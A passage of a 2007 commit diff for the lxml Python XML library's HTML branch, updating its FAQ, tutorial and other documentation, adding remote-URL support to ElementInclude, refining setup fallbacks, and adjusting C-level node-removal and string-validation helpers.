+ +Long answer: Two of the bigger problems with the Windows system are the lack +of a pre-installed standard compiler and the missing package management. Both +make it non-trivial to build lxml on this platform. We are trying hard to +make lxml as platform-independent as possible and it is regularly tested on +Windows systems. However, we currently cannot provide Windows binary +distributions ourselves. + +From time to time, users of different environments kindly contribute binary +builds of lxml, most frequently for Windows or Mac-OS X. We put these on the +Cheeseshop to make it as easy as possible for others to use lxml on their +platform. + +If there is not currently a binary distribution of the most recent lxml +release for your platform available from the Cheeseshop, please look through +the older versions to see if they provide a binary build. This is done by +appending the version number to the cheeseshop URL, e.g.: + + http://cheeseshop.python.org/pypi/lxml/1.1.2 + + Why do I get errors about missing UCS4 symbols when installing lxml? -------------------------------------------------------------------- @@ -228,6 +267,11 @@ .. _ReST: http://docutils.sourceforge.net/rst.html .. _`text files`: http://codespeak.net/svn/lxml/trunk/doc/ +* help with the tutorial. A tutorial is the most important starting point for + new users, so it is important for us to provide an easy to understand guide + into lxml. As with all documentation, the tutorial is work in progress, so we + appreciate every helping hand. + * improve the docstrings. lxml uses docstrings to support Python's integrated online ``help()`` function. However, sometimes these are not sufficient to grasp the details of the function in question. If you find such a place, @@ -238,45 +282,68 @@ Bugs ==== -My application crashes! Why does lxml.etree do that? ----------------------------------------------------- +My application crashes!
+----------------------- One of the goals of lxml is "no segfaults", so if there is no clear warning in the documentation that you were doing something potentially harmful, you have found a bug and we would like to hear about it. Please report this bug to the `mailing list`_. See the next section on how to do that. +However, there are a few things to try first, to make sure the problem is +really within lxml (or libxml2 or libxslt): -I think I have found a bug in lxml. What should I do? ------------------------------------------------------ - -a) First, you should look at the `current developer changelog`_ to see if this - is a known problem that has already been fixed in the SVN trunk. +a) If your application (or e.g. your web container) uses threads, please see + the FAQ section on threading to check if you touch on one of the + potential pitfalls. + +b) If you are on Mac-OS X, make sure lxml uses the correct libraries. If you + have updated the old system libraries (e.g. through fink), this is best + achieved by building lxml statically to prevent the different library + versions from interfering. If you choose to use a dynamically linked + version, make sure the ``DYLD_LIBRARY_PATH`` environment variable + contains the directory where you installed the libraries. + +In any case, try to reproduce the problem with the latest versions of +libxml2 and libxslt. From time to time, bugs and race conditions are found +in these libraries, so a more recent version might already contain a fix for +your problem. - .. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt -b) If you are using threads, please see the following section to check if - you touch on one of the potential pitfalls. +I think I have found a bug in lxml. What should I do? +----------------------------------------------------- -c) Try to reproduce the problem with the latest versions of libxml2 and - libxslt. 
From time to time, bugs and race conditions are found in these - libraries, so a more recent version might already contain a fix for your - problem. - -d) Otherwise, we would really like to hear about it. Please report it to the - `mailing list`_ so that we can fix it. It is very helpful in this case if - you can come up with a short code snippet that demonstrates your problem. - Please also report the version of lxml, libxml2 and libxslt that you are - using by calling this:: - - from lxml import etree - print "lxml.etree: ", etree.LXML_VERSION - print "libxml used: ", etree.LIBXML_VERSION - print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION - print "libxslt used: ", etree.LIBXSLT_VERSION - print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION +First, you should look at the `current developer changelog`_ to see if this +is a known problem that has already been fixed in the SVN trunk since the +release you are using. + +.. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt + +Also, the 'crash' section above has a few good advices what to try to see if +the problem is really in lxml - and not in your setup. Believe it or not, +that happens more often than you might think, especially when old libraries +or even multiple library versions are installed. + +You should always try to reproduce the problem with the latest versions of +libxml2 and libxslt - and make sure they are used (``lxml.etree`` can tell +you what it runs with, see below). + +Otherwise, we would really like to hear about it. Please report it to the +`mailing list`_ so that we can fix it. It is very helpful in this case if +you can come up with a short code snippet that demonstrates your problem. +If others can reproduce and see the problem, it is much easier for them to +fix it - and maybe even easier for you to describe it and get people +convinced that it really is a problem to fix. 
Please also report the +version of lxml, libxml2 and libxslt that you are using by calling this:: + + from lxml import etree + print "lxml.etree: ", etree.LXML_VERSION + print "libxml used: ", etree.LIBXML_VERSION + print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION + print "libxslt used: ", etree.LIBXSLT_VERSION + print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION - .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev Threading Modified: lxml/branch/html/doc/compatibility.txt ============================================================================== --- lxml/branch/html/doc/compatibility.txt (original) +++ lxml/branch/html/doc/compatibility.txt Fri Jun 29 19:05:43 2007 @@ -1,3 +1,4 @@ +============================= lxml.etree versus ElementTree ============================= @@ -25,12 +26,8 @@ # use from lxml import etree as ElementTree -* Some minor parts of the API of ElementTree have not yet been implemented and - are thus missing in lxml.etree. Feel free to help out! - -* Then again, lxml.etree offers a lot more functionality, such as - XPath, XSLT, Relax NG, and XML Schema support, which (c)ElementTree - does not offer. +* lxml.etree offers a lot more functionality, such as XPath, XSLT, Relax NG, + and XML Schema support, which (c)ElementTree does not offer. * etree has a different idea about Python unicode strings than ElementTree. In most parts of the API, ElementTree uses plain strings and unicode strings @@ -77,32 +74,40 @@ - Unfortunately this is a rather fundamental difference in behavior, which - will be hard to solve. It won't affect some applications, but if you want - to port code you must unfortunately make sure that it doesn't. + Unfortunately this is a rather fundamental difference in behavior, which is + hard to change. It won't affect some applications, but if you want to port + code you must unfortunately make sure that it doesn't affect yours. 
+ +* etree allows navigation to the parent of a node by the ``getparent()`` + method and to the siblings by calling ``getnext()`` and ``getprevious()``. + This is not possible in ElementTree as the underlying tree model does not + have this information. * When trying to set a subelement using __setitem__ that is in fact not an Element but some other object, etree raises a TypeError, and ElementTree raises an AssertionError. This also applies to some other places of the - API. In general, etree tries to avoid AssertionErrors in favour of being + API. In general, etree tries to avoid AssertionErrors in favour of being more specific about the reason for the exception. -* When parsing fails in ``iterparse()``, ElementTree raises an ExpatError - instead of a SyntaxError. lxml.etree follows the other parts of the parser - API and raises an (XML)SyntaxError. +* When parsing fails in ``iterparse()``, ElementTree raises a low-level + ExpatError instead of a SyntaxError as the other parsers. lxml.etree + follows the other parts of the parser API and raises an (XML)SyntaxError. * The ``iterparse()`` function in lxml is implemented based on the libxml2 - parser. This means that modifications of the document root or the ancestors - of the current element during parsing can irritate the parser and even - segfault. While this is not a problem in the Python object structure used - by ElementTree, the C tree underlying lxml suffers from it. The golden rule - for ``iterparse()`` on lxml therefore is: do not touch anything that will - have to be touched again by the parser later on. See the lxml API - documentation on this. + parser and tree generator. This means that modifications of the document + root or the ancestors of the current element during parsing can irritate the + parser and even segfault. While this is not a problem in the Python object + structure used by ElementTree, the C tree underlying lxml suffers from it. 
+ The golden rule for ``iterparse()`` on lxml therefore is: do not touch + anything that will have to be touched again by the parser later on. See the + lxml parser documentation on this. * ElementTree ignores comments and processing instructions when parsing XML, while etree will read them in and treat them as Comment or - ProcessingInstruction elements respectively. + ProcessingInstruction elements respectively. This is especially visible + where comments are found inside text content, which is then split by the + Comment element. You can disable this behaviour by passing the boolean + ``remove_comments`` keyword argument to the parser you use. * ElementTree has a bug when serializing an empty Comment (no text argument given) to XML, etree serializes this successfully. @@ -113,18 +118,19 @@ * ElementTree merges the target of a processing instruction into ``PI.text``, while lxml.etree puts it into the ``.target`` property and leaves it out of - the ``.text`` property. + the ``.text`` property. The ``pi.text`` in ElementTree therefore + corresponds to ``pi.target + " " + pi.text`` in lxml.etree. * Because etree is built on top of libxml2, which is namespace prefix aware, etree preserves namespaces declarations and prefixes while ElementTree tends to come up with its own prefixes (ns0, ns1, etc). When no namespace prefix - is given however, etree creates ElementTree style prefixes as well. + is given, however, etree creates ElementTree style prefixes as well. * etree has a 'prefix' attribute (read-only) on elements giving the Element's prefix, if this is known, and None otherwise (in case of no namespace at all, or default namespace). - etree further allows passing an 'nsmap' dictionary to the Element and +* etree further allows passing an 'nsmap' dictionary to the Element and SubElement element factories to explicitly map namespace prefixes to namespace URIs. These will be translated into namespace declarations on that element.
This means that in the probably rare case that you need to @@ -132,13 +138,9 @@ ElementTree, you cannot pass it as a keyword argument to the Element and SubElement factories directly. -* etree elements can be copied using copy.deepcopy() and copy.copy(), just - like ElementTree's. copy.copy() however does *not* create a shallow copy - where elements are shared between trees, as this makes no sense in the - context of libxml2 trees. Note that lxml can deep-copy trees considerably - faster than ElementTree. - -* etree allows navigation to the parent of a node by the ``getparent()`` - method and to the siblings by calling ``getnext()`` and ``getprevious()``. - This is not possible in ElementTree as the underlying tree model does not - have this information. +* etree elements can be copied using ``copy.deepcopy()`` and ``copy.copy()``, + just like ElementTree's. However, ``copy.copy()`` does *not* create a + shallow copy where elements are shared between trees, as this makes no sense + in the context of libxml2 trees. Note that lxml can deep-copy trees + considerably faster than ElementTree, so a deep copy might still be fast + enough to replace a shallow copy in your case. Modified: lxml/branch/html/doc/html/style.css ============================================================================== --- lxml/branch/html/doc/html/style.css (original) +++ lxml/branch/html/doc/html/style.css Fri Jun 29 19:05:43 2007 @@ -205,6 +205,12 @@ font-style: italic; } +div.line-block { + font-family: Times, "Times New Roman", serif; + text-align: center; + font-size: 140%; +} + code { color: Black; background-color: #cccccc; Modified: lxml/branch/html/doc/intro.txt ============================================================================== --- lxml/branch/html/doc/intro.txt (original) +++ lxml/branch/html/doc/intro.txt Fri Jun 29 19:05:43 2007 @@ -14,21 +14,20 @@ To explain the motto: -"Programming with libxml2 is like the thrilling embrace of an exotic -stranger. 
It seems to have the potential to fulfill your wildest -dreams, but there's a nagging voice somewhere in your head warning you -that you're about to get screwed in the worst way." (`a quote by Mark -Pilgrim`_) - -Mark Pilgrim was describing in particular the experience a Python -programmer has when dealing with libxml2. libxml2's default Python -bindings are fast, thrilling, powerful, and your code might fail in -some horrible way that you really shouldn't have to worry about when -writing Python code. lxml tries to combine the power of libxml2 with -the ease of use of Python. +"Programming with libxml2 is like the thrilling embrace of an exotic stranger. +It seems to have the potential to fulfill your wildest dreams, but there's a +nagging voice somewhere in your head warning you that you're about to get +screwed in the worst way." (`a quote by Mark Pilgrim`_) + +Mark Pilgrim was describing in particular the experience a Python programmer +has when dealing with libxml2. The default Python bindings of libxml2 are +fast, thrilling, powerful, and your code might fail in some horrible way that +you really shouldn't have to worry about when writing Python code. lxml +combines the power of libxml2 with the ease of use of Python. .. _`a quote by Mark Pilgrim`: http://diveintomark.org/archives/2004/02/18/libxml2 + Aims ---- @@ -36,6 +35,8 @@ * Standards-compliant XML support. +* Support for (broken) HTML. + * Full-featured. * Actively maintained by XML experts. @@ -46,8 +47,9 @@ .. _libxslt: http://xmlsoft.org/XSLT -These libraries already ship with Python bindings, but these Python -bindings have problems. In particular: + +These libraries already ship with Python bindings, but these Python bindings +mimic the C-level interface. This yields a number of problems: * very low level and C-ish (not Pythonic). @@ -55,12 +57,13 @@ * UTF-8 in API, instead of Python unicode strings. -* can cause segfaults from Python. +* Can easily cause segfaults from Python. 
+ +* Require manual memory management! -* have to do manual memory management! -lxml is a new Python binding for libxml2 and libxslt, completely -independent from these existing Python bindings. Its aim: +lxml is a new Python binding for libxml2 and libxslt, completely independent +from these existing Python bindings. Its aims: * Pythonic API. @@ -72,9 +75,8 @@ * No manual memory management! -lxml aims to provide a Pythonic API by following as much as possible -the `ElementTree API`_. We're trying to avoid having to invent too -many new APIs, or you having to learn new things -- XML is complicated -enough. +lxml aims to provide a Pythonic API by following as much as possible the +`ElementTree API`_. We're trying to avoid inventing too many new APIs, or you +having to learn new things -- XML is complicated enough. .. _`ElementTree API`: http://effbot.org/zone/element-index.htm Modified: lxml/branch/html/doc/main.txt ============================================================================== --- lxml/branch/html/doc/main.txt (original) +++ lxml/branch/html/doc/main.txt Fri Jun 29 19:05:43 2007 @@ -1,7 +1,15 @@ lxml ==== -.. contents:: +.. meta:: + :description: lxml - the most feature-rich and easy-to-use library for working with XML and HTML in the Python language + :keywords: lxml, etree, objectify, Python, XML, HTML + +| lxml is the most feature-rich +| and easy-to-use library +| for working with XML and HTML +| in the Python language. + .. 1 Introduction 2 Documentation @@ -14,9 +22,11 @@ Introduction ------------ -lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. See the -introduction_ for more information about background and goals. Some common -questions are answered in the FAQ_. +lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. It is +unique in that it combines the speed and feature completeness of these +libraries with the simplicity of a native Python API. 
See the introduction_ +for more information about background and goals. Some common questions are +answered in the FAQ_. .. _libxml2: http://xmlsoft.org .. _libxslt: http://xmlsoft.org/XSLT @@ -119,11 +129,9 @@ .. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ .. _`this key`: pubkey.asc -The latest version is `lxml 1.3beta`_, released 2007-02-27 (`changes for 1.3beta`_). +The latest version is `lxml 1.3`_, released 2007-06-24 (`changes for 1.3`_). `Older versions`_ are listed below. -.. _`lxml 1.3beta`: lxml-1.3beta.tgz -.. _`CHANGES for 1.3beta`: changes-1.3beta.html .. _`Older versions`: #old-versions Please take a look at the `installation instructions`_! @@ -150,16 +158,23 @@ Questions? Suggestions? Code to contribute? We have a `mailing list`_. +You can search the archive with Gmane_ or Google_. + .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _Gmane: http://blog.gmane.org/gmane.comp.python.lxml.devel +.. _Google: http://www.google.com/webhp?q=site:codespeak.net/mailman/listinfo/lxml-dev%20 License ------- -The lxml library is shipped under a BSD license. libxml2 and libxslt2 -itself are shipped under the MIT license. There should therefore be no +The lxml library is shipped under a `BSD license`_. libxml2 and libxslt2 +itself are shipped under the `MIT license`_. There should therefore be no obstacle to using lxml in your codebase. +.. _`BSD license`: http://codespeak.net/svn/lxml/trunk/doc/licenses/BSD.txt +.. _`MIT license`: http://www.opensource.org/licenses/mit-license.html + Old Versions ------------ @@ -200,6 +215,7 @@ * `lxml 0.5`_, released 2005-04-08 +.. _`lxml 1.3`: lxml-1.3.tgz .. _`lxml 1.2.1`: lxml-1.2.1.tgz .. _`lxml 1.2`: lxml-1.2.tgz .. _`lxml 1.1.2`: lxml-1.1.2.tgz @@ -219,6 +235,7 @@ .. _`lxml 0.5.1`: lxml-0.5.1.tgz .. _`lxml 0.5`: lxml-0.5.tgz +.. _`CHANGES for 1.3`: changes-1.3.html .. _`changes for 1.2.1`: changes-1.2.1.html .. _`changes for 1.2`: changes-1.2.html .. 
_`changes for 1.1.2`: changes-1.1.2.html Modified: lxml/branch/html/doc/objectify.txt ============================================================================== --- lxml/branch/html/doc/objectify.txt (original) +++ lxml/branch/html/doc/objectify.txt Fri Jun 29 19:05:43 2007 @@ -267,6 +267,28 @@ notB +Tree generation with the E-factory +---------------------------------- + +To simplify the generation of trees even further, you can use the E-factory:: + + >>> E = objectify.E + >>> root = E.root( + ... E.a(5), + ... E.b(6.1), + ... E.c(True), + ... E.d("how", tell="me") + ... ) + + >>> print etree.tostring(root, pretty_print=True) + + 5 + 6.1 + true + how + + + Namespace handling ------------------ Modified: lxml/branch/html/doc/parsing.txt ============================================================================== --- lxml/branch/html/doc/parsing.txt (original) +++ lxml/branch/html/doc/parsing.txt Fri Jun 29 19:05:43 2007 @@ -1,9 +1,10 @@ -===================== -Parsing XML with lxml -===================== - -lxml provides a very simple and powerful API for parsing XML. It supports -one-step parsing as well as step-by-step parsing using an event-driven API. +============================== +Parsing XML and HTML with lxml +============================== + +lxml provides a very simple and powerful API for parsing XML and HTML. It +supports one-step parsing as well as step-by-step parsing using an +event-driven API (currently only for XML). .. contents:: .. 
@@ -64,6 +65,10 @@ * remove_blank_text - discard blank text nodes between tags +* remove_comments - discard comments + +* compact - use compact storage for short text content (on by default) + Parsing HTML ------------ Modified: lxml/branch/html/doc/performance.txt ============================================================================== --- lxml/branch/html/doc/performance.txt (original) +++ lxml/branch/html/doc/performance.txt Fri Jun 29 19:05:43 2007 @@ -466,8 +466,11 @@ Since then, lxml has matured a lot and has gotten much faster. The iterparse variant now runs in 0.14 seconds, and if you remove the ``v.clear()``, it is -even a little faster (which isn't the case for cElementTree). When you move -the whole thing to a pure XPath implementation, it will look like this:: +even a little faster (which isn't the case for cElementTree). + +One of the many great tools in lxml is XPath, a swiss army knife for finding +things in XML documents. It is possible to move the whole thing to a pure +XPath implementation, which looks like this:: def bench_lxml_xpath_all(): tree = etree.parse("ot.xml") @@ -523,6 +526,11 @@ started with ``getiterator("v")`` or ``iterparse()``. Either of them would already have been the most efficient, depending on which library is used. +* It's important to know your tool. lxml and cElementTree are both very fast + libraries, but they do not have the same performance characteristics. The + fastest solution in one library can be comparatively slow in the other. If + you optimise, optimise for the specific target platform. + * It's not always worth optimising. After all that hassle we got from 0.12 seconds for the initial implementation to 0.11 seconds. 
Switching over to cElementTree and writing an ``iterparse()`` based version would have given Modified: lxml/branch/html/doc/tutorial.txt ============================================================================== --- lxml/branch/html/doc/tutorial.txt (original) +++ lxml/branch/html/doc/tutorial.txt Fri Jun 29 19:05:43 2007 @@ -31,8 +31,8 @@ >>> from lxml import etree If your code only uses the ElementTree API and does not rely on any -functionality that is specific to ``lxml.etree``, you can also use the -following import chain as a fall-back to the original ElementTree:: +functionality that is specific to ``lxml.etree``, you can also use (any part +of) the following import chain as a fall-back to the original ElementTree:: try: from lxml import etree @@ -108,7 +108,7 @@ ------------------ To make the access to these subelements as easy and straight forward as -possible, elements behave exactly like normal Python lists:: +possible, elements behave like normal Python lists:: >>> child = root[0] >>> print child.tag @@ -133,7 +133,7 @@ >>> print end[0].tag child3 - >>> root[0] = root[-1] + >>> root[0] = root[-1] # this moves the element! >>> for child in root: ... print child.tag child3 @@ -239,9 +239,9 @@ >>> print etree.tostring(root) TEXT -In many XML documents (so-called *data-centric* documents), this is the only -place where text can be found. It is encapsulated by a leaf tag at the very -bottom of the tree hierarchy. +In many XML documents (*data-centric* documents), this is the only place where +text can be found. It is encapsulated by a leaf tag at the very bottom of the +tree hierarchy. However, if XML is used for tagged text documents such as (X)HTML, text can also appear between different elements, right in the middle of the tree:: @@ -249,9 +249,9 @@ Hello
World Here, the ``
`` tag is surrounded by text. This is often referred to as -*document-style* XML. Elements support this through their ``tail`` property. -It contains the text that directly follows the element, up to the next element -in the XML tree:: +*document-style* or *mixed-content* XML. Elements support this through their +``tail`` property. It contains the text that directly follows the element, up +to the next element in the XML tree:: >>> html = etree.Element("html") >>> body = etree.SubElement(html, "body") @@ -280,8 +280,8 @@ If you want to use this more often, you can wrap it in a function:: - >>> buildTextList = etree.XPath("//text()") # lxml.etree only! - >>> print buildTextList(html) + >>> build_text_list = etree.XPath("//text()") # lxml.etree only! + >>> print build_text_list(html) ['TEXT', 'TAIL'] .. _XPath: xpathxslt.html#xpath @@ -344,9 +344,148 @@ The parse() function -------------------- + Namespaces ========== +The ElementTree API avoids `namespace prefixes`_ wherever possible and deploys +the real namespaces instead:: + + >>> xhtml = etree.Element("{http://www.w3.org/1999/xhtml}html") + >>> body = etree.SubElement(xhtml, "{http://www.w3.org/1999/xhtml}body") + >>> body.text = "Hello World" + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + +.. _`namespace prefixes`: http://www.w3.org/TR/xml-names/#ns-qualnames + +As you can see, prefixes only become important when you serialise the result. +However, the above code becomes somewhat verbose due to the lengthy namespace +names. And retyping or copying a string over and over again is error prone. +It is therefore common practice to store a namespace URI in a global variable. +To adapt the namespace prefixes for serialisation, you can also pass a mapping +to the Element factory, e.g. 
to define the default namespace:: + + >>> XHTML_NAMESPACE = "http://www.w3.org/1999/xhtml" + >>> XHTML = "{%s}" % XHTML_NAMESPACE + + >>> NSMAP = {None : XHTML_NAMESPACE} # the default namespace (no prefix) + + >>> xhtml = etree.Element(XHTML + "html", nsmap=NSMAP) # lxml only! + >>> body = etree.SubElement(xhtml, XHTML + "body") + >>> body.text = "Hello World" + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + +Namespaces on attributes work alike:: + + >>> body.set(XHTML + "bgcolor", "#CCFFAA") + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + + >>> print body.get("bgcolor") + None + >>> body.get(XHTML + "bgcolor") + '#CCFFAA' + +You can also use XPath in this way:: + + >>> find_xhtml_body = etree.ETXPath( # lxml only ! + ... "//{%s}body" % XHTML_NAMESPACE) + >>> results = find_xhtml_body(xhtml) + + >>> print results[0].tag + {http://www.w3.org/1999/xhtml}body + + +The E-factory +============= + +The ``E-factory`` provides a simple and compact syntax for generating XML and +HTML:: + + >>> from lxml.builder import E + + >>> def CLASS(*args): # class is a reserved word in Python + ... return {"class":' '.join(args)} + + >>> html = page = ( + ... E.html( # create an Element called "html" + ... E.head( + ... E.title("This is a sample document") + ... ), + ... E.body( + ... E.h1("Hello!", CLASS("title")), + ... E.p("This is a paragraph with ", E.b("bold"), " text in it!"), + ... E.p("This is another paragraph, with a ", + ... E.a("link", href="http://www.python.org"), "."), + ... E.p("Here are some reservered characters: ."), + ... etree.XML("

And finally an embedded XHTML fragment.

"), + ... ) + ... ) + ... ) + + >>> print etree.tostring(page, pretty_print=True) + + + This is a sample document + + +

Hello!

+

This is a paragraph with bold text in it!

+

This is another paragraph, with a link.

+

Here are some reservered characters: <spam&egg>.

+

And finally an embedded XHTML fragment.

+ + + +The Element creation based on attribute access makes it easy to build up a +simple vocabulary for an XML language:: + + >>> DOC = E.doc + >>> TITLE = E.title + >>> SECTION = E.section + >>> PAR = E.par + + >>> my_doc = DOC( + ... TITLE("The dog and the hog"), + ... SECTION( + ... TITLE("The dog"), + ... PAR("Once upon a time, ..."), + ... PAR("And then ...") + ... ), + ... SECTION( + ... TITLE("The hog"), + ... PAR("Sooner or later ...") + ... ) + ... ) + + >>> print etree.tostring(my_doc, pretty_print=True) + + The dog and the hog +
+ The dog + Once upon a time, ... + And then ... +
+
+ The hog + Sooner or later ... +
+
+ +One such example is the module ``lxml.html.builder``, which provides a +vocabulary for HTML. + ElementPath =========== Modified: lxml/branch/html/setup.py ============================================================================== --- lxml/branch/html/setup.py (original) +++ lxml/branch/html/setup.py Fri Jun 29 19:05:43 2007 @@ -1,12 +1,21 @@ -from ez_setup import use_setuptools -use_setuptools(version="0.5") - -from setuptools import setup import sys, os -# need to insert this to python path so we're sure we can import -# versioninfo and setupinfo even if we start setup.py from another -# location (such as a buildout) +try: + try: + import pkg_resources + pkg_resources.require("setuptools>=0.6c5") + except pkg_resources.VersionConflict, e: + from ez_setup import use_setuptools + use_setuptools(version="0.6c5") + raise ImportError + from setuptools import setup +except ImportError: + # not setuptools installed + from distutils.core import setup + +# need to insert this to python path so we're sure we can import versioninfo, +# setupinfo and Pyrex (!) 
even if we start setup.py from another location +# (such as a buildout) sys.path.insert(0, os.path.dirname(__file__)) import versioninfo Modified: lxml/branch/html/setupinfo.py ============================================================================== --- lxml/branch/html/setupinfo.py (original) +++ lxml/branch/html/setupinfo.py Fri Jun 29 19:05:43 2007 @@ -1,5 +1,8 @@ import sys, os -from setuptools.extension import Extension +try: + from setuptools.extension import Extension +except ImportError: + from distutils.extension import Extension try: from Pyrex.Distutils import build_ext as build_pyx Modified: lxml/branch/html/src/lxml/ElementInclude.py ============================================================================== --- lxml/branch/html/src/lxml/ElementInclude.py (original) +++ lxml/branch/html/src/lxml/ElementInclude.py Fri Jun 29 19:05:43 2007 @@ -46,6 +46,8 @@ ## import copy, etree +from urlparse import urljoin +from urllib2 import urlopen try: set @@ -95,7 +97,12 @@ if parse == "xml": data = etree.parse(href, parser).getroot() else: - data = open(href).read() + if "://" in href: + f = urlopen(href) + else: + f = open(href) + data = f.read() + f.close() if encoding: data = data.decode(encoding) return data @@ -121,15 +128,20 @@ # @throws IOError If the function fails to load a given resource. 
# @returns the node or its replacement if it was an XInclude node -def include(elem, loader=None): - if hasattr(elem, 'getroot'): - #if hasattr(elem, 'docinfo'): - # base_url = elem.docinfo.URL - _include(elem.getroot(), loader) - else: - _include(elem, loader) +def include(elem, loader=None, base_url=None): + if base_url is None: + if hasattr(elem, 'getroot'): + tree = elem + elem = elem.getroot() + else: + tree = elem.getroottree() + if hasattr(tree, 'docinfo'): + base_url = tree.docinfo.URL + elif hasattr(elem, 'getroot'): + elem = elem.getroot() + _include(elem, loader, base_url=base_url) -def _include(elem, loader=None, _parent_hrefs=None): +def _include(elem, loader=None, _parent_hrefs=None, base_url=None): if loader is not None: load_include = _wrap_et_loader(loader) else: @@ -146,7 +158,7 @@ for e in include_elements: if e.tag == XINCLUDE_INCLUDE: # process xinclude directive - href = e.get("href") + href = urljoin(base_url, e.get("href")) parse = e.get("parse", "xml") parent = e.getparent() if parse == "xml": Modified: lxml/branch/html/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/html/src/lxml/apihelpers.pxi (original) +++ lxml/branch/html/src/lxml/apihelpers.pxi Fri Jun 29 19:05:43 2007 @@ -459,6 +459,8 @@ * its name string equals the c_name string """ cdef char* c_node_href + if c_node is NULL: + return 0 if c_node.type != tree.XML_ELEMENT_NODE: # not an element, only succeed if we match everything return c_name is NULL and c_href is NULL @@ -485,11 +487,17 @@ else: return 0 -cdef void _removeNode(xmlNode* c_node): - """Unlink and free a node and subnodes if possible. +cdef void _removeNode(_Document doc, xmlNode* c_node): + """Unlink and free a node and subnodes if possible. Otherwise, make sure + it's self-contained. 
""" + cdef xmlNode* c_next + c_next = c_node.next tree.xmlUnlinkNode(c_node) - attemptDeallocation(c_node) + _moveTail(c_next, c_node) + if not attemptDeallocation(c_node): + # make namespaces absolute + moveNodeToDocument(doc, c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): cdef xmlNode* c_next @@ -517,7 +525,8 @@ c_target = c_new_tail c_tail = _textNodeOrSkip(c_tail.next) -cdef xmlNode* _deleteSlice(xmlNode* c_node, Py_ssize_t start, Py_ssize_t stop): +cdef xmlNode* _deleteSlice(_Document doc, xmlNode* c_node, + Py_ssize_t start, Py_ssize_t stop): """Delete slice, starting with c_node, start counting at start, end at stop. """ cdef xmlNode* c_next @@ -529,9 +538,9 @@ while c_node is not NULL and c < stop: c_next = c_node.next if _isElement(c_node): - _removeText(c_node.next) - c_next = c_node.next - _removeNode(c_node) + while c_next is not NULL and not _isElement(c_next): + c_next = c_next.next + _removeNode(doc, c_node) c = c + 1 c_node = c_next return c_node @@ -550,7 +559,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(child, parent._doc) + moveNodeToDocument(parent._doc, c_node) cdef void _appendSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -566,7 +575,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef void _prependSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -582,7 +591,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. 
- moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef int isutf8(char* s): cdef char c @@ -598,16 +607,20 @@ cdef char* s cdef char* c_end cdef char c + cdef int is_non_ascii s = _cstr(pystring) c_end = s + python.PyString_GET_SIZE(pystring) + is_non_ascii = 0 while s < c_end: c = s[0] - if c == c'\0': - return -1 # invalid! if c & 0x80: - return 1 # non-ASCII + is_non_ascii = 1 + elif c == c'\0': + return -1 # invalid! + elif is_non_ascii == 0 and not tree.xmlIsChar_ch(c): + return -1 # invalid! s = s + 1 - return 0 # plain 7-bit ASCII + return is_non_ascii cdef object funicode(char* s): cdef Py_ssize_t slen @@ -628,12 +641,15 @@ cdef object _utf8(object s): if python.PyString_Check(s): assert not isutf8py(s), \ - "All strings must be Unicode or ASCII" - return s + "All strings must be XML compatible, either Unicode or ASCII" elif python.PyUnicode_Check(s): - return python.PyUnicode_AsUTF8String(s) + # FIXME: we should test these strings, too ... + s = python.PyUnicode_AsUTF8String(s) + assert isutf8py(s) != -1, \ + "All strings must be XML compatible, either Unicode or ASCII" else: raise TypeError, "Argument must be string or unicode." + return s cdef object _encodeFilename(object filename): if filename is None: Modified: lxml/branch/html/src/lxml/builder.py ============================================================================== --- lxml/branch/html/src/lxml/builder.py (original) +++ lxml/branch/html/src/lxml/builder.py Fri Jun 29 19:05:43 2007 @@ -1,10 +1,37 @@ -""" -Element generator factory by Fredrik Lundh. - -Source: - http://online.effbot.org/2006_11_01_archive.htm#et-builder - http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py -""" +# +# Element generator factory by Fredrik Lundh. 
+# +# Source: +# http://online.effbot.org/2006_11_01_archive.htm#et-builder +# http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py +# +# -------------------------------------------------------------------- +# The ElementTree toolkit is +# +# Copyright (c) 1999-2004 by Fredrik Lundh +# +# By obtaining, using, and/or copying this software and/or its +# associated documentation, you agree that you have read, understood, +# and will comply with the following terms and conditions: +# +# Permission to use, copy, modify, and distribute this software and +# its associated documentation for any purpose and without fee is +# hereby granted, provided that the above copyright notice appears in +# all copies, and that both that copyright notice and this permission +# notice appear in supporting documentation, and that the name of +# Secret Labs AB or the author not be used in advertising or publicity +# pertaining to distribution of the software without specific, written +# prior permission. +# +# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD +# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT- +# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR +# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY +# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, +# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE 